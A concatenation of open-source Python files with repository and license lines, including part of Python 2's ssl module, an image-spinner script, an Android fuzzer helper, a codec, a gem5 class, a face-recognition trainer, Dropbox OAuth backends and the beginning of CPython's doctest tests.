def __init__(self, sock, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True,
suppress_ragged_eofs=True, ciphers=None):
socket.__init__(self, _sock=sock._sock)
# The initializer for socket overrides the methods send(), recv(), etc.
# in the instancce, which we don't need -- but we want to provide the
# methods defined in SSLSocket.
for attr in _delegate_methods:
try:
delattr(self, attr)
except AttributeError:
pass
if certfile and not keyfile:
keyfile = certfile
# see if it's connected
try:
socket.getpeername(self)
except socket_error, e:
if e.errno != errno.ENOTCONN:
raise
# no, no connection yet
self._connected = False
self._sslobj = None
else:
# yes, create the SSL object
self._connected = True
self._sslobj = _ssl.sslwrap(self._sock, server_side,
keyfile, certfile,
cert_reqs, ssl_version, ca_certs,
ciphers)
if do_handshake_on_connect:
self.do_handshake()
self.keyfile = keyfile
self.certfile = certfile
self.cert_reqs = cert_reqs
self.ssl_version = ssl_version
self.ca_certs = ca_certs
self.ciphers = ciphers
self.do_handshake_on_connect = do_handshake_on_connect
self.suppress_ragged_eofs = suppress_ragged_eofs
self._makefile_refs = 0
def read(self, len=1024):
"""Read up to LEN bytes and return them.
Return zero-length string on EOF."""
try:
return self._sslobj.read(len)
except SSLError, x:
if x.args[0] == SSL_ERROR_EOF and self.suppress_ragged_eofs:
return ''
else:
raise
def write(self, data):
"""Write DATA to the underlying SSL channel. Returns
number of bytes of DATA actually transmitted."""
return self._sslobj.write(data)
def getpeercert(self, binary_form=False):
"""Returns a formatted version of the data in the
certificate provided by the other end of the SSL channel.
Return None if no certificate was provided, {} if a
certificate was provided, but not validated."""
return self._sslobj.peer_certificate(binary_form)
def cipher(self):
if not self._sslobj:
return None
else:
return self._sslobj.cipher()
def send(self, data, flags=0):
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to send() on %s" %
self.__class__)
while True:
try:
v = self._sslobj.write(data)
except SSLError, x:
if x.args[0] == SSL_ERROR_WANT_READ:
return 0
elif x.args[0] == SSL_ERROR_WANT_WRITE:
return 0
else:
raise
else:
return v
else:
return self._sock.send(data, flags)
def sendto(self, data, flags_or_addr, addr=None):
if self._sslobj:
raise ValueError("sendto not allowed on instances of %s" %
self.__class__)
elif addr is None:
return self._sock.sendto(data, flags_or_addr)
else:
return self._sock.sendto(data, flags_or_addr, addr)
def sendall(self, data, flags=0):
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to sendall() on %s" %
self.__class__)
amount = len(data)
count = 0
while (count < amount):
v = self.send(data[count:])
count += v
return amount
else:
return socket.sendall(self, data, flags)
def recv(self, buflen=1024, flags=0):
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to recv() on %s" %
self.__class__)
return self.read(buflen)
else:
return self._sock.recv(buflen, flags)
def recv_into(self, buffer, nbytes=None, flags=0):
if buffer and (nbytes is None):
nbytes = len(buffer)
elif nbytes is None:
nbytes = 1024
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to recv_into() on %s" %
self.__class__)
tmp_buffer = self.read(nbytes)
v = len(tmp_buffer)
buffer[:v] = tmp_buffer
return v
else:
return self._sock.recv_into(buffer, nbytes, flags)
def recvfrom(self, buflen=1024, flags=0):
if self._sslobj:
raise ValueError("recvfrom not allowed on instances of %s" %
self.__class__)
else:
return self._sock.recvfrom(buflen, flags)
def recvfrom_into(self, buffer, nbytes=None, flags=0):
if self._sslobj:
raise ValueError("recvfrom_into not allowed on instances of %s" %
self.__class__)
else:
return self._sock.recvfrom_into(buffer, nbytes, flags)
def pending(self):
if self._sslobj:
return self._sslobj.pending()
else:
return 0
def unwrap(self):
if self._sslobj:
s = self._sslobj.shutdown()
self._sslobj = None
return s
else:
raise ValueError("No SSL wrapper around " + str(self))
def shutdown(self, how):
self._sslobj = None
socket.shutdown(self, how)
def close(self):
if self._makefile_refs < 1:
self._sslobj = None
socket.close(self)
else:
self._makefile_refs -= 1
def do_handshake(self):
"""Perform a TLS/SSL handshake."""
self._sslobj.do_handshake()
def _real_connect(self, addr, return_errno):
# Here we assume that the socket is client-side, and not
# connected at the time of the call. We connect it, then wrap it.
if self._connected:
raise ValueError("attempt to connect already-connected SSLSocket!")
self._sslobj = _ssl.sslwrap(self._sock, False, self.keyfile, self.certfile,
self.cert_reqs, self.ssl_version,
self.ca_certs, self.ciphers)
try:
socket.connect(self, addr)
if self.do_handshake_on_connect:
self.do_handshake()
except socket_error as e:
if return_errno:
return e.errno
else:
self._sslobj = None
raise e
self._connected = True
return 0
def connect(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
self._real_connect(addr, False)
def connect_ex(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
return self._real_connect(addr, True)
def accept(self):
"""Accepts a new connection from a remote client, and returns
a tuple containing that new connection wrapped with a server-side
SSL channel, and the address of the remote client."""
newsock, addr = socket.accept(self)
return (SSLSocket(newsock,
keyfile=self.keyfile,
certfile=self.certfile,
server_side=True,
cert_reqs=self.cert_reqs,
ssl_version=self.ssl_version,
ca_certs=self.ca_certs,
ciphers=self.ciphers,
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs),
addr)
def makefile(self, mode='r', bufsize=-1):
"""Make and return a file-like object that
works with the SSL connection. Just use the code
from the socket module."""
self._makefile_refs += 1
# close=True so as to decrement the reference count when done with
# the file-like object.
return _fileobject(self, mode, bufsize, close=True)
def wrap_socket(sock, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True,
suppress_ragged_eofs=True, ciphers=None):
return SSLSocket(sock, keyfile=keyfile, certfile=certfile,
server_side=server_side, cert_reqs=cert_reqs,
ssl_version=ssl_version, ca_certs=ca_certs,
do_handshake_on_connect=do_handshake_on_connect,
suppress_ragged_eofs=suppress_ragged_eofs,
ciphers=ciphers)
# some utility functions
def cert_time_to_seconds(cert_time):
"""Takes a date-time string in standard ASN1_print form
("MON DAY 24HOUR:MINUTE:SEC YEAR TIMEZONE") and return
a Python time value in seconds past the epoch."""
import time
return time.mktime(time.strptime(cert_time, "%b %d %H:%M:%S %Y GMT"))
PEM_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_FOOTER = "-----END CERTIFICATE-----"
def DER_cert_to_PEM_cert(der_cert_bytes):
"""Takes a certificate in binary DER format and returns the
PEM version of it as a string."""
if hasattr(base64, 'standard_b64encode'):
# preferred because older API gets line-length wrong
f = base64.standard_b64encode(der_cert_bytes)
return (PEM_HEADER + '\n' +
textwrap.fill(f, 64) + '\n' +
PEM_FOOTER + '\n')
else:
return (PEM_HEADER + '\n' +
base64.encodestring(der_cert_bytes) +
PEM_FOOTER + '\n')
def PEM_cert_to_DER_cert(pem_cert_string):
"""Takes a certificate in ASCII PEM format and returns the
DER-encoded version of it as a byte sequence"""
if not pem_cert_string.startswith(PEM_HEADER):
raise ValueError("Invalid PEM encoding; must start with %s"
% PEM_HEADER)
if not pem_cert_string.strip().endswith(PEM_FOOTER):
raise ValueError("Invalid PEM encoding; must end with %s"
% PEM_FOOTER)
d = pem_cert_string.strip()[len(PEM_HEADER):-len(PEM_FOOTER)]
return base64.decodestring(d)
def get_server_certificate(addr, ssl_version=PROTOCOL_SSLv3, ca_certs=None):
"""Retrieve the certificate from the server at the specified address,
and return it as a PEM-encoded string.
If 'ca_certs' is specified, validate the server cert against it.
If 'ssl_version' is specified, use it in the connection attempt."""
host, port = addr
if (ca_certs is not None):
cert_reqs = CERT_REQUIRED
else:
cert_reqs = CERT_NONE
s = wrap_socket(socket(), ssl_version=ssl_version,
cert_reqs=cert_reqs, ca_certs=ca_certs)
s.connect(addr)
dercert = s.getpeercert(True)
s.close()
return DER_cert_to_PEM_cert(dercert)
def get_protocol_name(protocol_code):
return _PROTOCOL_NAMES.get(protocol_code, '<unknown>')
# a replacement for the old socket.ssl function
def sslwrap_simple(sock, keyfile=None, certfile=None):
"""A replacement for the old socket.ssl function. Designed
for compability with Python 2.5 and earlier. Will disappear in
Python 3.0."""
if hasattr(sock, "_sock"):
sock = sock._sock
ssl_sock = _ssl.sslwrap(sock, 0, keyfile, certfile, CERT_NONE,
PROTOCOL_SSLv23, None)
try:
sock.getpeername()
except socket_error:
# no, no connection yet
pass
else:
# yes, do the handshake
ssl_sock.do_handshake()
return ssl_sock
| gpl-3.0 |
ohmygodcoin/ohmygodcoin | share/qt/make_spinner.py | 4415 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
SRC='img/reload_scaled.png'
DST='../../src/qt/res/movies/update_spinner.mng'
TMPDIR='/tmp'
TMPNAME='tmp-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
im_src = Image.open(SRC)
if CLOCKWISE:
im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
for frame in xrange(NUMFRAMES):
rotation = (frame + 0.5) / NUMFRAMES * 360.0
if CLOCKWISE:
rotation = -rotation
im_new = im_src.rotate(rotation, Image.BICUBIC)
im_new.thumbnail(DSIZE, Image.ANTIALIAS)
outfile = frame_to_filename(frame)
im_new.save(outfile, 'png')
frame_files.append(outfile)
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit |
Android-leak/MFFA | utils.py | 20 | 1048 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
/*
* Android media framework fuzzer
* Copyright (c) 2015, Intel Corporation.
* Author: Alexandru Blanda (ioan-alexandru.blanda@intel.com)
*
* This program is free software; you can redistribute it and/or modify it
* under the terms and conditions of the GNU General Public License,
* version 2, as published by the Free Software Foundation.
*
* This program is distributed in the hope it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*/
"""
from os import listdir
import os
import sys
import subprocess
import re
import time
def run_subproc(cmd):
r = subprocess.Popen([cmd], shell=True)
r.wait()
"""
def subprocess_return(cmd):
r = subprocess.Popen([cmd], shell=True)
r.wait()
"""
def flush_log(device_id):
cmd = 'adb -s ' + (str)(device_id) + ' logcat -c'
r = subprocess.Popen([cmd], shell=True)
r.wait()
| gpl-2.0 |
pyblish/pyblish-win | lib/Python27/Lib/encodings/undefined.py | 860 | 1299 | """ Python 'undefined' Codec
This codec will always raise a ValueError exception when being
used. It is intended for use by the site.py file to switch off
automatic string to Unicode coercion.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
raise UnicodeError("undefined encoding")
def decode(self,input,errors='strict'):
raise UnicodeError("undefined encoding")
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
raise UnicodeError("undefined encoding")
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
raise UnicodeError("undefined encoding")
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='undefined',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
| lgpl-3.0 |
xiaoyaozi5566/DiamondCache | src/arch/alpha/AlphaInterrupts.py | 20 | 1710 | # Copyright (c) 2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.SimObject import SimObject
class AlphaInterrupts(SimObject):
type = 'AlphaInterrupts'
cxx_class = 'AlphaISA::Interrupts'
| bsd-3-clause |
tdicola/pi-facerec-box | train.py | 2 | 3037 | """Raspberry Pi Face Recognition Treasure Box
Face Recognition Training Script
Copyright 2013 Tony DiCola
Run this script to train the face recognition system with positive and negative
training images. The face recognition model is based on the eigen faces
algorithm implemented in OpenCV. You can find more details on the algorithm
and face recognition here:
http://docs.opencv.org/modules/contrib/doc/facerec/facerec_tutorial.html
"""
import fnmatch
import os
import cv2
import numpy as np
import config
import face
MEAN_FILE = 'mean.png'
POSITIVE_EIGENFACE_FILE = 'positive_eigenface.png'
NEGATIVE_EIGENFACE_FILE = 'negative_eigenface.png'
def walk_files(directory, match='*'):
"""Generator function to iterate through all files in a directory recursively
which match the given filename match parameter.
"""
for root, dirs, files in os.walk(directory):
for filename in fnmatch.filter(files, match):
yield os.path.join(root, filename)
def prepare_image(filename):
"""Read an image as grayscale and resize it to the appropriate size for
training the face recognition model.
"""
return face.resize(cv2.imread(filename, cv2.IMREAD_GRAYSCALE))
def normalize(X, low, high, dtype=None):
"""Normalizes a given array in X to a value between low and high.
Adapted from python OpenCV face recognition example at:
https://github.com/Itseez/opencv/blob/2.4/samples/python2/facerec_demo.py
"""
X = np.asarray(X)
minX, maxX = np.min(X), np.max(X)
# normalize to [0...1].
X = X - float(minX)
X = X / float((maxX - minX))
# scale to [low...high].
X = X * (high-low)
X = X + low
if dtype is None:
return np.asarray(X)
return np.asarray(X, dtype=dtype)
if __name__ == '__main__':
print "Reading training images..."
faces = []
labels = []
pos_count = 0
neg_count = 0
# Read all positive images
for filename in walk_files(config.POSITIVE_DIR, '*.pgm'):
faces.append(prepare_image(filename))
labels.append(config.POSITIVE_LABEL)
pos_count += 1
# Read all negative images
for filename in walk_files(config.NEGATIVE_DIR, '*.pgm'):
faces.append(prepare_image(filename))
labels.append(config.NEGATIVE_LABEL)
neg_count += 1
print 'Read', pos_count, 'positive images and', neg_count, 'negative images.'
# Train model
print 'Training model...'
model = cv2.createEigenFaceRecognizer()
model.train(np.asarray(faces), np.asarray(labels))
# Save model results
model.save(config.TRAINING_FILE)
print 'Training data saved to', config.TRAINING_FILE
# Save mean and eignface images which summarize the face recognition model.
mean = model.getMat("mean").reshape(faces[0].shape)
cv2.imwrite(MEAN_FILE, normalize(mean, 0, 255, dtype=np.uint8))
eigenvectors = model.getMat("eigenvectors")
pos_eigenvector = eigenvectors[:,0].reshape(faces[0].shape)
cv2.imwrite(POSITIVE_EIGENFACE_FILE, normalize(pos_eigenvector, 0, 255, dtype=np.uint8))
neg_eigenvector = eigenvectors[:,1].reshape(faces[0].shape)
cv2.imwrite(NEGATIVE_EIGENFACE_FILE, normalize(neg_eigenvector, 0, 255, dtype=np.uint8))
| mit |
barseghyanartur/python-social-auth | social/backends/dropbox.py | 83 | 2385 | """
Dropbox OAuth1 backend, docs at:
http://psa.matiasaguirre.net/docs/backends/dropbox.html
"""
from social.backends.oauth import BaseOAuth1, BaseOAuth2
class DropboxOAuth(BaseOAuth1):
"""Dropbox OAuth authentication backend"""
name = 'dropbox'
ID_KEY = 'uid'
AUTHORIZATION_URL = 'https://www.dropbox.com/1/oauth/authorize'
REQUEST_TOKEN_URL = 'https://api.dropbox.com/1/oauth/request_token'
REQUEST_TOKEN_METHOD = 'POST'
ACCESS_TOKEN_URL = 'https://api.dropbox.com/1/oauth/access_token'
ACCESS_TOKEN_METHOD = 'POST'
REDIRECT_URI_PARAMETER_NAME = 'oauth_callback'
EXTRA_DATA = [
('id', 'id'),
('expires', 'expires')
]
def get_user_details(self, response):
"""Return user details from Dropbox account"""
fullname, first_name, last_name = self.get_user_names(
response.get('display_name')
)
return {'username': str(response.get('uid')),
'email': response.get('email'),
'fullname': fullname,
'first_name': first_name,
'last_name': last_name}
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from service"""
return self.get_json('https://api.dropbox.com/1/account/info',
auth=self.oauth_auth(access_token))
class DropboxOAuth2(BaseOAuth2):
name = 'dropbox-oauth2'
ID_KEY = 'uid'
AUTHORIZATION_URL = 'https://www.dropbox.com/1/oauth2/authorize'
ACCESS_TOKEN_URL = 'https://api.dropbox.com/1/oauth2/token'
ACCESS_TOKEN_METHOD = 'POST'
REDIRECT_STATE = False
EXTRA_DATA = [
('uid', 'username'),
]
def get_user_details(self, response):
"""Return user details from Dropbox account"""
fullname, first_name, last_name = self.get_user_names(
response.get('display_name')
)
return {'username': str(response.get('uid')),
'email': response.get('email'),
'fullname': fullname,
'first_name': first_name,
'last_name': last_name}
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from service"""
return self.get_json(
'https://api.dropbox.com/1/account/info',
headers={'Authorization': 'Bearer {0}'.format(access_token)}
)
| bsd-3-clause |
PennartLoettring/Poettrix | rootfs/usr/lib/python3.4/test/test_doctest.py | 72 | 94252 | """
Test script for doctest.
"""
from test import support
import doctest
import os
import sys
# NOTE: There are some additional tests relating to interaction with
# zipimport in the test_zipimport_support test module.
######################################################################
## Sample Objects (used by test cases)
######################################################################
def sample_func(v):
"""
Blah blah
>>> print(sample_func(22))
44
Yee ha!
"""
return v+v
class SampleClass:
"""
>>> print(1)
1
>>> # comments get ignored. so are empty PS1 and PS2 prompts:
>>>
...
Multiline example:
>>> sc = SampleClass(3)
>>> for i in range(10):
... sc = sc.double()
... print(' ', sc.get(), sep='', end='')
6 12 24 48 96 192 384 768 1536 3072
"""
def __init__(self, val):
"""
>>> print(SampleClass(12).get())
12
"""
self.val = val
def double(self):
"""
>>> print(SampleClass(12).double().get())
24
"""
return SampleClass(self.val + self.val)
def get(self):
"""
>>> print(SampleClass(-5).get())
-5
"""
return self.val
def a_staticmethod(v):
"""
>>> print(SampleClass.a_staticmethod(10))
11
"""
return v+1
a_staticmethod = staticmethod(a_staticmethod)
def a_classmethod(cls, v):
"""
>>> print(SampleClass.a_classmethod(10))
12
>>> print(SampleClass(0).a_classmethod(10))
12
"""
return v+2
a_classmethod = classmethod(a_classmethod)
a_property = property(get, doc="""
>>> print(SampleClass(22).a_property)
22
""")
class NestedClass:
"""
>>> x = SampleClass.NestedClass(5)
>>> y = x.square()
>>> print(y.get())
25
"""
def __init__(self, val=0):
"""
>>> print(SampleClass.NestedClass().get())
0
"""
self.val = val
def square(self):
return SampleClass.NestedClass(self.val*self.val)
def get(self):
return self.val
class SampleNewStyleClass(object):
r"""
>>> print('1\n2\n3')
1
2
3
"""
def __init__(self, val):
"""
>>> print(SampleNewStyleClass(12).get())
12
"""
self.val = val
def double(self):
"""
>>> print(SampleNewStyleClass(12).double().get())
24
"""
return SampleNewStyleClass(self.val + self.val)
def get(self):
"""
>>> print(SampleNewStyleClass(-5).get())
-5
"""
return self.val
######################################################################
## Fake stdin (for testing interactive debugging)
######################################################################
class _FakeInput:
"""
A fake input stream for pdb's interactive debugger. Whenever a
line is read, print it (to simulate the user typing it), and then
return it. The set of lines to return is specified in the
constructor; they should not have trailing newlines.
"""
def __init__(self, lines):
self.lines = lines
def readline(self):
line = self.lines.pop(0)
print(line)
return line+'\n'
######################################################################
## Test Cases
######################################################################
def test_Example(): r"""
Unit tests for the `Example` class.
Example is a simple container class that holds:
- `source`: A source string.
- `want`: An expected output string.
- `exc_msg`: An expected exception message string (or None if no
exception is expected).
- `lineno`: A line number (within the docstring).
- `indent`: The example's indentation in the input string.
- `options`: An option dictionary, mapping option flags to True or
False.
These attributes are set by the constructor. `source` and `want` are
required; the other attributes all have default values:
>>> example = doctest.Example('print(1)', '1\n')
>>> (example.source, example.want, example.exc_msg,
... example.lineno, example.indent, example.options)
('print(1)\n', '1\n', None, 0, 0, {})
The first three attributes (`source`, `want`, and `exc_msg`) may be
specified positionally; the remaining arguments should be specified as
keyword arguments:
>>> exc_msg = 'IndexError: pop from an empty list'
>>> example = doctest.Example('[].pop()', '', exc_msg,
... lineno=5, indent=4,
... options={doctest.ELLIPSIS: True})
>>> (example.source, example.want, example.exc_msg,
... example.lineno, example.indent, example.options)
('[].pop()\n', '', 'IndexError: pop from an empty list\n', 5, 4, {8: True})
The constructor normalizes the `source` string to end in a newline:
Source spans a single line: no terminating newline.
>>> e = doctest.Example('print(1)', '1\n')
>>> e.source, e.want
('print(1)\n', '1\n')
>>> e = doctest.Example('print(1)\n', '1\n')
>>> e.source, e.want
('print(1)\n', '1\n')
Source spans multiple lines: require terminating newline.
>>> e = doctest.Example('print(1);\nprint(2)\n', '1\n2\n')
>>> e.source, e.want
('print(1);\nprint(2)\n', '1\n2\n')
>>> e = doctest.Example('print(1);\nprint(2)', '1\n2\n')
>>> e.source, e.want
('print(1);\nprint(2)\n', '1\n2\n')
Empty source string (which should never appear in real examples)
>>> e = doctest.Example('', '')
>>> e.source, e.want
('\n', '')
The constructor normalizes the `want` string to end in a newline,
unless it's the empty string:
>>> e = doctest.Example('print(1)', '1\n')
>>> e.source, e.want
('print(1)\n', '1\n')
>>> e = doctest.Example('print(1)', '1')
>>> e.source, e.want
('print(1)\n', '1\n')
>>> e = doctest.Example('print', '')
>>> e.source, e.want
('print\n', '')
The constructor normalizes the `exc_msg` string to end in a newline,
unless it's `None`:
Message spans one line
>>> exc_msg = 'IndexError: pop from an empty list'
>>> e = doctest.Example('[].pop()', '', exc_msg)
>>> e.exc_msg
'IndexError: pop from an empty list\n'
>>> exc_msg = 'IndexError: pop from an empty list\n'
>>> e = doctest.Example('[].pop()', '', exc_msg)
>>> e.exc_msg
'IndexError: pop from an empty list\n'
Message spans multiple lines
>>> exc_msg = 'ValueError: 1\n 2'
>>> e = doctest.Example('raise ValueError("1\n 2")', '', exc_msg)
>>> e.exc_msg
'ValueError: 1\n 2\n'
>>> exc_msg = 'ValueError: 1\n 2\n'
>>> e = doctest.Example('raise ValueError("1\n 2")', '', exc_msg)
>>> e.exc_msg
'ValueError: 1\n 2\n'
Empty (but non-None) exception message (which should never appear
in real examples)
>>> exc_msg = ''
>>> e = doctest.Example('raise X()', '', exc_msg)
>>> e.exc_msg
'\n'
Compare `Example`:
>>> example = doctest.Example('print 1', '1\n')
>>> same_example = doctest.Example('print 1', '1\n')
>>> other_example = doctest.Example('print 42', '42\n')
>>> example == same_example
True
>>> example != same_example
False
>>> hash(example) == hash(same_example)
True
>>> example == other_example
False
>>> example != other_example
True
"""
def test_DocTest(): r"""
Unit tests for the `DocTest` class.
DocTest is a collection of examples, extracted from a docstring, along
with information about where the docstring comes from (a name,
filename, and line number). The docstring is parsed by the `DocTest`
constructor:
>>> docstring = '''
... >>> print(12)
... 12
...
... Non-example text.
...
... >>> print('another\example')
... another
... example
... '''
>>> globs = {} # globals to run the test in.
>>> parser = doctest.DocTestParser()
>>> test = parser.get_doctest(docstring, globs, 'some_test',
... 'some_file', 20)
>>> print(test)
<DocTest some_test from some_file:20 (2 examples)>
>>> len(test.examples)
2
>>> e1, e2 = test.examples
>>> (e1.source, e1.want, e1.lineno)
('print(12)\n', '12\n', 1)
>>> (e2.source, e2.want, e2.lineno)
("print('another\\example')\n", 'another\nexample\n', 6)
Source information (name, filename, and line number) is available as
attributes on the doctest object:
>>> (test.name, test.filename, test.lineno)
('some_test', 'some_file', 20)
The line number of an example within its containing file is found by
adding the line number of the example and the line number of its
containing test:
>>> test.lineno + e1.lineno
21
>>> test.lineno + e2.lineno
26
If the docstring contains inconsistant leading whitespace in the
expected output of an example, then `DocTest` will raise a ValueError:
>>> docstring = r'''
... >>> print('bad\nindentation')
... bad
... indentation
... '''
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 4 of the docstring for some_test has inconsistent leading whitespace: 'indentation'
If the docstring contains inconsistent leading whitespace on
continuation lines, then `DocTest` will raise a ValueError:
>>> docstring = r'''
... >>> print(('bad indentation',
... ... 2))
... ('bad', 'indentation')
... '''
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 2 of the docstring for some_test has inconsistent leading whitespace: '... 2))'
If there's no blank space after a PS1 prompt ('>>>'), then `DocTest`
will raise a ValueError:
>>> docstring = '>>>print(1)\n1'
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 1 of the docstring for some_test lacks blank after >>>: '>>>print(1)'
If there's no blank space after a PS2 prompt ('...'), then `DocTest`
will raise a ValueError:
>>> docstring = '>>> if 1:\n...print(1)\n1'
>>> parser.get_doctest(docstring, globs, 'some_test', 'filename', 0)
Traceback (most recent call last):
ValueError: line 2 of the docstring for some_test lacks blank after ...: '...print(1)'
Compare `DocTest`:
>>> docstring = '''
... >>> print 12
... 12
... '''
>>> test = parser.get_doctest(docstring, globs, 'some_test',
... 'some_test', 20)
>>> same_test = parser.get_doctest(docstring, globs, 'some_test',
... 'some_test', 20)
>>> test == same_test
True
>>> test != same_test
False
>>> hash(test) == hash(same_test)
True
>>> docstring = '''
... >>> print 42
... 42
... '''
>>> other_test = parser.get_doctest(docstring, globs, 'other_test',
... 'other_file', 10)
>>> test == other_test
False
>>> test != other_test
True
Compare `DocTestCase`:
>>> DocTestCase = doctest.DocTestCase
>>> test_case = DocTestCase(test)
>>> same_test_case = DocTestCase(same_test)
>>> other_test_case = DocTestCase(other_test)
>>> test_case == same_test_case
True
>>> test_case != same_test_case
False
>>> hash(test_case) == hash(same_test_case)
True
>>> test == other_test_case
False
>>> test != other_test_case
True
"""
class test_DocTestFinder:
def basics(): r"""
Unit tests for the `DocTestFinder` class.
DocTestFinder is used to extract DocTests from an object's docstring
and the docstrings of its contained objects. It can be used with
modules, functions, classes, methods, staticmethods, classmethods, and
properties.
Finding Tests in Functions
~~~~~~~~~~~~~~~~~~~~~~~~~~
For a function whose docstring contains examples, DocTestFinder.find()
will return a single test (for that function's docstring):
>>> finder = doctest.DocTestFinder()
We'll simulate a __file__ attr that ends in pyc:
>>> import test.test_doctest
>>> old = test.test_doctest.__file__
>>> test.test_doctest.__file__ = 'test_doctest.pyc'
>>> tests = finder.find(sample_func)
>>> print(tests) # doctest: +ELLIPSIS
[<DocTest sample_func from ...:18 (1 example)>]
The exact name depends on how test_doctest was invoked, so allow for
leading path components.
>>> tests[0].filename # doctest: +ELLIPSIS
'...test_doctest.py'
>>> test.test_doctest.__file__ = old
>>> e = tests[0].examples[0]
>>> (e.source, e.want, e.lineno)
('print(sample_func(22))\n', '44\n', 3)
By default, tests are created for objects with no docstring:
>>> def no_docstring(v):
... pass
>>> finder.find(no_docstring)
[]
However, the optional argument `exclude_empty` to the DocTestFinder
constructor can be used to exclude tests for objects with empty
docstrings:
>>> def no_docstring(v):
... pass
>>> excl_empty_finder = doctest.DocTestFinder(exclude_empty=True)
>>> excl_empty_finder.find(no_docstring)
[]
If the function has a docstring with no examples, then a test with no
examples is returned. (This lets `DocTestRunner` collect statistics
about which functions have no tests -- but is that useful? And should
an empty test also be created when there's no docstring?)
>>> def no_examples(v):
... ''' no doctest examples '''
>>> finder.find(no_examples) # doctest: +ELLIPSIS
[<DocTest no_examples from ...:1 (no examples)>]
Finding Tests in Classes
~~~~~~~~~~~~~~~~~~~~~~~~
For a class, DocTestFinder will create a test for the class's
docstring, and will recursively explore its contents, including
methods, classmethods, staticmethods, properties, and nested classes.
>>> finder = doctest.DocTestFinder()
>>> tests = finder.find(SampleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
3 SampleClass
3 SampleClass.NestedClass
1 SampleClass.NestedClass.__init__
1 SampleClass.__init__
2 SampleClass.a_classmethod
1 SampleClass.a_property
1 SampleClass.a_staticmethod
1 SampleClass.double
1 SampleClass.get
New-style classes are also supported:
>>> tests = finder.find(SampleNewStyleClass)
>>> for t in tests:
... print('%2s %s' % (len(t.examples), t.name))
1 SampleNewStyleClass
1 SampleNewStyleClass.__init__
1 SampleNewStyleClass.double
1 SampleNewStyleClass.get
Finding Tests in Modules
~~~~~~~~~~~~~~~~~~~~~~~~
For a module, DocTestFinder will create a test for the class's
docstring, and will recursively explore its contents, including
functions, classes, and the `__test__` dictionary, if it exists:
>>> # A module
>>> import types
>>> m = types.ModuleType('some_module')
>>> def triple(val):
... '''
... >>> print(triple(11))
... 33
... '''
... return val*3
>>> m.__dict__.update({
... 'sample_func': sample_func,
... 'SampleClass': SampleClass,
... '__doc__': '''
... Module docstring.
... >>> print('module')
... module
... ''',
